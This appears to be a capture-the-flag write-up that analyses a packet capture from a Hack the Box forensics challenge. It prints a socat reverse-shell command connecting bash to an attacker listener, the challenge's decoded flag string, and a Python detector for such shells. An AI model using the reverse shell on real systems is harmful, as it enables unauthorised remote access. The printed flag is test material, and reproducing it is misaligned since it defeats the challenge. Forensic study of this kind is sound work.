HTB • Wrong Spooky Season
Wrong Spooky Season is a forensics challenge released by c4n0pus on Hack the Box that is marked as very easy and involves analyzing a packet capture to pinpoint malicious traffic.
“I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong.” Now there is an internal breach in the `Spooky Network` and you need to find out what happened. Analyze the network traffic and find how the scary ghosts got in and what they did.
Packet Capture Analysis
We’ll be using Wireshark to analyze the packets in the packet capture file.
HTTP Traffic
The first thing we notice when opening the capture is that there is some plaintext HTTP traffic.
The first impression of the captured traffic
We’ll use the filter `http` to display only HTTP packets. Looking at the HTTP traffic, it seems that client 192.168.1.180 has uploaded a JSP web shell and is running commands through GET requests.
Malicious HTTP Command & Control
The attacker can be seen installing the `socat` utility, then running it like so:

```bash
socat TCP:192.168.1.180:1337 EXEC:bash
```

This connects out to the attacker's listener at 192.168.1.180:1337 and attaches the standard input and output of `bash` to that socket, establishing a TCP reverse shell on port 1337.
Reverse Shell
We’ll use the filter `tcp.port==1337`, then follow the TCP stream of the packets to view the reverse shell session.
The last command sent by the attacker is a statement that does pretty much nothing: the reversed output is discarded into `/dev/null`, so the only thing it achieves is carrying the string through the session.

```bash
echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev > /dev/null
```

The leading `==` is base64 padding sitting at the wrong end, a tell that the string was reversed. Reversing it back and base64-decoding it yields the flag.

```bash
echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev | base64 -d
```
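The two tells from this capture, a `socat ... EXEC:bash` reverse shell and an `echo ... | rev` line smuggling a reversed base64 string, can be picked out of a followed TCP stream automatically. The script below is an added example, not part of the write-up; the session text is constructed around the two commands seen above, and the `apt` and `id` lines are assumed filler.

```python
import base64
import binascii
import re

# Constructed sample of what "Follow TCP Stream" shows for the attacker side of
# the tcp.port==1337 session. The socat and echo lines are the ones from the
# capture; the other two lines are assumed filler for realism.
SESSION = """\
id
apt-get install -y socat
socat TCP:192.168.1.180:1337 EXEC:bash
echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev > /dev/null
"""

# socat TCP:<host>:<port> EXEC:<program> is the reverse-shell shape seen here.
SOCAT_REVERSE = re.compile(
    r"socat\s+TCP:(?P<host>[\w.\-]+):(?P<port>\d+)\s+EXEC:(?P<prog>\S+)"
)
# A base64-looking token piped into rev: the payload is stored reversed.
ECHO_REV = re.compile(r'echo\s+"(?P<token>[A-Za-z0-9+/=]+)"\s*\|\s*rev\b')


def find_reverse_shells(session: str) -> list[tuple[str, int, str]]:
    """Return (host, port, program) for every socat reverse-shell command."""
    return [(m["host"], int(m["port"]), m["prog"]) for m in SOCAT_REVERSE.finditer(session)]


def looks_reversed_base64(token: str) -> bool:
    """Padding '=' only ever appears at the end of base64, so a leading '=' is
    a strong hint that the string was reversed."""
    return token.startswith("=") and not token.endswith("=")


def decode_reversed_base64(token: str) -> str:
    """Undo rev and base64, mirroring `echo ... | rev | base64 -d`."""
    raw = base64.b64decode(token[::-1], validate=True)
    return raw.decode("utf-8", errors="replace").rstrip("\n")


def find_hidden_payloads(session: str) -> list[str]:
    """Decode every echo|rev token that decodes cleanly as reversed base64."""
    found = []
    for m in ECHO_REV.finditer(session):
        token = m["token"]
        if not looks_reversed_base64(token):
            continue
        try:
            found.append(decode_reversed_base64(token))
        except (binascii.Error, ValueError):
            continue  # not valid base64 once reversed; skip rather than crash
    return found
```

Running `find_reverse_shells(SESSION)` reports the listener the host connected back to, and `find_hidden_payloads(SESSION)` prints the decoded flag.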